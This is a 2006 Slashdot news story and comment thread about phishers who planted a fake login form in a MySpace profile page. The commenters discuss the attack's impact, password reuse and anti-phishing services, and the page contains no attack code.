Forgot your password?
typodupeerror

MySpace Accounts Compromised By Phishers 86

Posted by kdawson
from the even-the-wary-beware dept.
An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
This discussion has been archived. No new comments can be posted.

MySpace Accounts Compromised By Phishers

Comments Filter:
  • by AVryhof (142320) <avryhof AT gawab DOT com> on Sunday October 29, 2006 @03:02PM (#16634080) Homepage
    Maybe it's been my fault it's taken so long to "discover"

    I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

    I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.
    • Re: (Score:2, Funny)

      by Anonymous Coward
      Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.
    • Re: (Score:2, Funny)

      by Packt (1017572)
      "Dear diary... mood? Apathetic."
  • Widespread exploitation of myspace could cause up to $6 dollars in damages
  • Finally (Score:3, Funny)

    by 1310nm (687270) on Sunday October 29, 2006 @03:09PM (#16634128)
    Keep up the good work, phishers!

    The secrets of apathetic teens will soon be aired for the world to view!
    • Not quite. (Score:1, Informative)

      by Anonymous Coward
      "Despite public perception, most MySpace users are over 35, according to a release today [05 Oct 2006] by ComScore. The stat-tracking company says that as MySpace continues to grow, its user base is skewing older - teens accounted for around 25% of users in August 2005, but now only represent 12% of the audience. Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year."

      http://www.comscore.com/press/release.asp?press=10 19 [comscore.com]
      • by Fred_A (10934) <fredNO@SPAMfredshome.org> on Sunday October 29, 2006 @04:07PM (#16634684) Homepage
        Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year.
        So it's TheirSpace now ?
      • by 1310nm (687270)
        Guess I should have just called them "narcissists" instead of "apathetic teens".
      • by 5of0 (935391)
        But how many of these over-35ers are actually over 35? And how many are over 100? Is there any accountability check as to the ages? Looking at their article, they're counting unique visitors - did they pop up a little box that said "Hey, how old are you?" A very important part is that it says "MySpace Visitors" - not users. So not users, but parents checking up on their little users, or pedophiles looking for their next victim. This just means Xanga is less browsed by those types. Anyone else see this?
    • .. which seems to be the most popular with the angsty crowd. MySpace, on the other hand, is the single largest concentration of insanity, drama and nonsense ever, surpassing even LJ. I'm not kidding - just try browsing through some of the comments and profiles on MySpace and you'll lose all faith in humanity in the space of about five minutes.
      • besides if you really wanted to do this right you would have

        1 a real like paid domain ------- got that myself
        2 a real like paid hosting agreement ----- i use imagelinkusa.net myself
        3 some actual html skills (or some sanish tools)
        if you want to use some crawling horror like Myspace setup some sort of Zen profile and LINK YOUR DOMAIN

        (funny thing is mySpace is blocked by at least one company)
      • Why did you have faith in humanity in the first place?\

        Just curious...
  • by Anonymous Coward on Sunday October 29, 2006 @03:13PM (#16634170)
    OpenDNS people started http://phishtank.com/ [phishtank.com] service which is completely community based, as you can actually see the phishes and verify them, I have seen some amazing stuff around. Compromised servers having SSL certificate which are abused in phishing operation, some pages having fake addressbar on top and most important of all, USA based banks are being phished from USA cable modem subscriber (haxored) and nothing done against it for days.

    BTW as it is free to use, SURBL added it, now the stuff which you verify actually helps to people using that free list.
  • by Aexia (517457)
    MySpace is dying
  • As much as they will beat this feature to death over the next few months, it will only deter the least sophisticated methods. Most of which are already history.

    Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.

    Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?

    I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.
    • by d3ik (798966)
      If you're implying that MySpace is Web 2.0 I'd have to disagree. MySpace may be great for 'social networking', but from a technical point of view it's a nightmare. Malformed HTML, non-degradable Javascript, code injection issues... it's like a bad joke.
      • > MySpace may be great for 'social networking', but from a technical point of
        > view it's a nightmare. Malformed HTML, non-degradable Javascript, code
        > injection issues...

        In other words, Web 2.0.
  • http://www.myspace.com/login_home_index_html [myspace.com]

    Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.

    Next!?
    • Re: (Score:1, Insightful)

      by Anonymous Coward
      Seems Myspace has fixed it.

      No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

      Expect to see a large number of variations on this to show up in the next few days/weeks.

  • by kihjin (866070) on Sunday October 29, 2006 @03:24PM (#16634254)
    FTA:

    The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

    Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

    So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.
  • With MySpace being so popular and with its users regularly logging in on a daily basis, I wonder what the impact of this was in terms of:
    1) the total number of "phished" accounts
    2) the number of "phished" accounts in terms of a percentage of the total userbase.
    • Possible not many since less than one third of all my space accounts are active.
      • by otisg (92803)
        Really? Where did you get this information? I haven't seen this information published anywhere... but would love to see where this info comes from.
        • Using a sample size of 14 Million accounts only about 4 Million were accessed within 14 days of the page being sampled and contained more that the default information. Of those the vast majority were access within 3 days of the sample date. This rate remains fairly constant throughtout the the user space starting with the first users.
          • by otisg (92803)
            This is an experiment you performed on your own?
            • Yes. I did it originally to see the age distribution of the users to see if it really was populated by teenagers who identify themselves as 12-15 year old girls and therefore be an easy hunting ground for the dreaded pedophiles. Well this is what I found:

              MySpace Age Ranges By Gender As Indicated By Users
              Age Range % Male % Female % Total

              12 to 15 0.0007 0.0012 0.0019
              16 to 18 9.25 12.39 21.64
              19 to 21 11.64 12.29 23.93
              22 to 35 22.90 18.00 40.90
              36 to 55
    • by Siroro (957832)
      I used to host a free web hosting service. And as you can imagine it did attract some unsavoury characters - one of the accounts was used as a MySpace phishing account, it was only on-line for 1-2 days before I managed to catch and ban the account, but in this time it did manage to obtain details for over 2000 individual logins - whether or not all of these credentials worked or not I can't say for sure. I tried contacting MySpace offering over these credentials but I didn't receive an e-mail back.
  • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?
    • by otisg (92803)
      You clearly didn't read the Washington Post article.

      The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

      That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays
      • by Fred_A (10934)
        The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.
        Ah yes but mom and dad would do so with a different account and password and home directory, right ?
        Huh ? Right ?

        Guys ?
      • Yeah... I certainly had to read the Post article. My first thought on the story was "Phish a MySpace account?!? That's like an elaborate plot to steal manure!"

    • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      People login to myspace with an email address and password.

      If a person used the same password for their email, then not only is their email comprimised, but via their email, the attacker gets a list of other potential sites to try.


      I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run
    • by 4D6963 (933028)

      MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and that bulletins one of your favourite singers or friends say "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you

    • by prodangle (552537)
      According to Tom [myspace.com] (the guy who runs Myspace, I think) spammers can use login credentials to send spam to friends of a user. There are also screenshots on Tom's blogpost - it seems the best workaround so far is instructing users to type myspace into the address bar themselves before logging in.
  • I clicked a myspace profile link in a friends bulletin which sent me to what I thought was the login page (I failed to check that hostname was indeed login.myspace.com) The login didn't appear to work and I attributed it to myspace being down at the time. It wasn't till later that I noticed I had posted a similar bulletin with a similar link (though that profile was already dead by the time I checked it). As far as I can tell the only thing they did was post a bulletin to try to get more accounts. I was abl
    • by SheeEttin (899897)
      What's even funnier is when you make an example phishing site and clearly mark it as phishing... and people still enter their information.

      True story... and I posted it on a forum wher you don't want to click any links.

      (Captcha: mourning... I am, indeed, for today's security.)
  • Another danger of getting username/password combinations is that so many people use the same username/password EVERYWHERE. Once a thief gets the username/password for ANY site, even a completely useless site with nothing of value, they could then do a systematic login attempt at all the common sites and banks where you might be able to do some real damage.
  • It's not these little phishing sites that scare me, it's the banking\credit union sites. For example, http://www.wamucards.com/ [wamucards.com] (DON'T ENTER YOUR INFO HERE!).

    How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 [slashdot.org] In cases like these, i guess it makes sense
    • Re: (Score:3, Insightful)

      by baadger (764884)

      How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 [slashdot.org] 6225 In cases like these, i guess it makes sense

      When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

      Besides, Verisig

    • Re: (Score:3, Interesting)

      by LO0G (606364)
      I'm confused. Here's the domain registration for wamucards.com:
      Registrant:
      Washington Mutual, Inc. (DOM-1398425)
      1201 3rd Ave Seattle WA 98101 US

      Domain Name: wamucards.com

      Registrar Name: Markmonitor.com
      Registrar Whois: whois.markmonitor.com
      Registrar Homepage: http://www.markmonitor.com/ [markmonitor.com]

      Administrative Contact:
  • This is really old news. Phishers have been around myspace for ever. They used to use embedded flash with action script to redirect and myspace upgraded to flash 9 which allows the server to restrict flash redirects ( a feature added at myspace's request). They mostly use the phished accounts for myspace spamming and botnet-worm distribution.
  • if people had just installed Firefox 2
  • My girlfriends account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.

    I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, a attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.

    The des

  • I tried to visit www.myspace.com/login_home_index_html and it appears the account has been taken down.

    Either that, or, that's what these scammers want us to think?
  • i remember when i was on the YTMND irc channel and some guy posted a link to a text file with 3k myspace logins. good times
  • So, how long was this active, does anybody know? The netcraft article is from the 27th, and today is the 29th. I believe it's down now, but how long has it been down since Netcraft notified myspace about it? It seems very trivial for myspace web admins to verify that the code includes the specific suspect URL and to take immediate action against it. In my industry (healthcare insurance), if any leak of information or incorrect data is suspected, the websites in question are immediately taken down until
    • When we first came across this information a few days ago, it was also linked to Mashable.com [mashable.com], which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).

      Filtering based on blacklists (as you are suggesting M

  • Those who maybe wondering why Phishers used Myspace.

    1. It is a good way to get information about the user
    2. Good way to get information about the user's friends.
    3. How many pc illiterate often use same password for multiple accounts?

    I have already added the following line to my hosts files:

    216.178.32.51 greentea420.iespanna.es
  • Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

    War is fun when you hate both sides.
  • (Generally young) people with no desire to gain any technical understand of securely maintaining responsibility over their own information use an (invariably) insecure operating system to access a web site designed specifically to make someone very rich by feeding advertisements at the same people in a way that makes them feel like "one of the pack" whilst divesting the site owners of any responsibility of that personal data by offering the service as "free".
  • This just adds to the reasons why I'm glad I stopped using this service. I deleted my account on here a few months ago. I was getting sick of the fake spam/scam accounts wanting to invite me to be their "friend". Yeah I know setting my profile to non public would stop this but then it defeats the the whole part of having friends being able to find you.

    Also the MySpace site is general is kinda clunky.. Looks like some high school kids project thats still learning HTML. Another words it look like crap. I

Premature optimization is the root of all evil. -- D.E. Knuth

Working...